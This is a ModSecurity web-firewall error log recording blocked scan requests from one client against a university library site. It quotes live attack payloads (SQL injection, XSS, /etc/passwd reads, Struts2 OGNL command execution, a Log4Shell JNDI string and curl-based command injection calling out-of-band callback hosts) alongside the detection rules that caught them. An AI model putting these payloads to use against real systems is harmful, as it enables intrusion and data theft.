[Tue Aug 29 11:33:40.323594 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAANsAjQAAAAD"]
[Tue Aug 29 11:33:40.383094 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11JMCo-f0AAARA7ikAAAAA"]
[Tue Aug 29 11:33:40.404259 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARA7ioAAAAA"]
[Tue Aug 29 11:33:41.320960 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAARv7U8AAAAY"]
[Tue Aug 29 11:33:41.340181 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JcCo-f0AAANsAjkAAAAD"]
[Tue Aug 29 11:33:42.340237 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAAQKOogAAAAs"]
[Tue Aug 29 11:33:43.400899 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAARQ4BwAAAAB"]
[Tue Aug 29 11:33:45.419610 2023] [:error] [pid 1155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAASDb5kAAAAA"]
[Tue Aug 29 11:33:46.304081 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAASBXS4AAAAM"]
[Tue Aug 29 11:33:47.395589 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlg8o3zihcwkicmg.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARdiMIAAAAK"]
[Tue Aug 29 11:33:48.308549 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "digilibft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAARo83cAAAAT"]
[Tue Aug 29 11:33:48.328801 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgmtchfhufq9sr1.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAARjjR0AAAAL"]
[Tue Aug 29 11:33:49.306606 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlg5uzfogt11bktd.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAANsAl0AAAAD"]
[Tue Aug 29 11:33:49.340849 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "digilibft.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAAR@KIUAAAAF"]
[Tue Aug 29 11:33:50.363680 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgzf1ka9aud57gk.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAARjjSgAAAAL"]
[Tue Aug 29 11:33:50.367476 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "digilibft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAARdiMoAAAAK"]
[Tue Aug 29 11:33:51.331434 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "digilibft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAARdiM4AAAAK"]
[Tue Aug 29 11:33:52.371662 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAASEJQ4AAAAE"]
[Tue Aug 29 11:33:52.492094 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "digilibft.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAAR@KJcAAAAF"]
[Tue Aug 29 11:33:53.310464 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgue8b75mdwimur.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAASEJRgAAAAE"]
[Tue Aug 29 11:33:53.329577 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgwtdeasizezmpe.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAASEJRkAAAAE"]
[Tue Aug 29 11:33:53.429160 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "digilibft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAAQKOqcAAAAs"]
[Tue Aug 29 11:33:54.380091 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAAQKOqsAAAAs"]
[Tue Aug 29 11:33:54.398450 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "digilibft.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAARy-1oAAAAb"]
